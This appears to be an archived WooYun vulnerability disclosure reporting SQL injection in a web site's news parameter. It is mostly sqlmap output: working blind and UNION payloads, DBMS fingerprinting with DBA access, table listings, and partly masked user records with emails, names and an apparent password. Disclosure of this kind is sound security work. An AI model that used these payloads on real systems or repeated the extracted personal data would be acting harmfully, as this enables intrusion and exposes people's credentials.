乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
RT
注入点:http://**.**.**.**/index.php?fn=news&fn1=detail&no=285&no5=C
sqlmap identified the following injection point(s) with a total of 100 HTTP(s) requests:---Parameter: no (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fn=news&fn1=detail&no=285 AND 9559=9559&no5=C Type: UNION query Title: MySQL UNION query (14) - 11 columns Payload: fn=news&fn1=detail&no=-7065 UNION ALL SELECT 14,CONCAT(0x7178787a71,0x525074796575674d7456,0x7162706271),14,14,14,14,14,14,14,14,14#&no5=C---web server operating system: Linux Fedoraweb application technology: Apache 2.2.19, PHP 5.3.6back-end DBMS: MySQL >= 5.0.0current database: 'NTCU'current user is DBA: Trueavailable databases [4]:[*] information_schema[*] mysql[*] NTCU[*] performance_schema
表:
back-end DBMS: MySQL 5Database: NTCU[68 tables]+--------------+| ABOUT || AIRCRAFT || ASK || BILLPIC || BINEWS || BPRODID || CALENDER || CARDLOVE || CARDSTYLE || CARDTOMAIL || CHANGEITEM || CITEM || CODIFICATION || COMPANY || CPRODID || DATAS || DISORID || DISSAY || DOWN || DOWNCATE || DOWNFILE || EMAN || EPACIL || EPAPER || EPAPROCIL || EPASENDS || EPATOMAIL || EPA_PROD || EVABPRID || EVACPRID || EVADOWN || FACTORY || GRPSELK || IMPROERR || INDPIC || INFORMATION || JOIN1 || JOINACTIVE || JOINOTHMSG || JOINPAPER || MARK || MSG || MSGTOMAIL || NEWS2 || OTHMSG || PAPER_ST || SENDINTURN || SEP || STKIND || SYSCUST || SYSPAYKIND || SYSTEMSET || SYSUSER2 || USERGROUP || USERINGROUP || USERLOG || USER_COL || USER_DCOL || USER_DTL || VOTECIL || VOTEPA || VOTESENDS || VOTETIL || VOTETOMAIL || VOTE_RE || VOTE_SUB || VOTE_SUBL || USER |+--------------+
表太多没仔细看,看了一个user表
Table: USER[5 columns]+----------+-------------+| Column | Type |+----------+-------------+| email | non-numeric || jobid | non-numeric || name | non-numeric || userid | non-numeric || userpass | non-numeric |+----------+-------------+
部分数据:
[21:12:03] [INFO] retrieved: willianman@**.**.**.**[21:12:03] [INFO] retrieving the length of query output[21:12:03] [INFO] retrieved: 10[21:12:22] [INFO] retrieved: willianman[21:12:22] [INFO] retrieving the length of query output[21:12:22] [INFO] retrieved: 19[21:12:44] [INFO] retrieved: owl3316@**.**.**.**[21:12:44] [INFO] retrieving the length of query output[21:12:44] [INFO] retrieved: 1[21:12:47] [INFO] retrieved: N[21:12:52] [INFO] retrieving the length of query output[21:12:52] [INFO] retrieved: 3[21:14:18] [INFO] retrieved: 廖彥涵[21:14:18] [INFO] retrieving the length of query output[21:14:18] [INFO] retrieved: 19[21:14:46] [INFO] retrieved: owl3316@**.**.**.**[21:14:46] [INFO] retrieving the length of query output[21:14:46] [INFO] retrieved: 7[21:15:02] [INFO] retrieved: owl3316
危害等级:高
漏洞Rank:16
确认时间:2015-12-08 19:52
感謝通報
暂无